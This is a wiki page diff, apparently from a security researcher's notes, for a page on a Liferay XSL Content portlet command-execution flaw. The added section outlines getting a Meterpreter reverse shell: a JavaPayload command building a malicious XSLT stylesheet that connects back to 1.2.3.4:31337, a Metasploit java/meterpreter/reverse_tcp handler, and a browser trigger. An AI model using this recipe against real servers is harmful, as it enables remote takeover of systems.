Changes for page Application_Liferay

Last modified by Nicolas Gregoire on 2012/04/19 14:05
From version Icon 23.3 Icon
edited by Nicolas Gregoire
on 2012/01/25 10:54
Change comment: Added tag [XEE]
To version Icon 24.1 Icon
edited by Nicolas Gregoire
on 2012/04/19 14:05
Change comment: There is no comment for this version

Summary

Details

Icon Page properties
Content
... ... @@ -14,6 +14,15 @@
14 14  
15 15  [[image:liferay-execute-commands-with-stdout.png||style="display: block; margin-left: auto; margin-right: auto"]]
16 16  
17 += Meterpreter shell =
18 +
19 +As described in [[Feature #6594: Liferay XSL Command Execution>>http://dev.metasploit.com/redmine/issues/6594||rel="__blank"]], here's a way to gain a Meterpreter shell with this vulnerability :
20 +
21 +- stand-alone JavaPayload to generate the XSLT stylesheet (java jar JavaPayload.jar Builder Template XalanJ.xsl output.xsl ReverseTCP 1.2.3.4 31337 -- JSh)
22 +- Metasploit to handle the Meterpreter connection (PAYLOAD=java/meterpreter/reverse_tcp)
23 +- Manual interaction to trigger the vulnerability (browser)
24 +
25 +
17 17  = Additional vulnerabilities =
18 18  
19 19  Two others vulnerabilities were identified in the "XSL Content" portlet :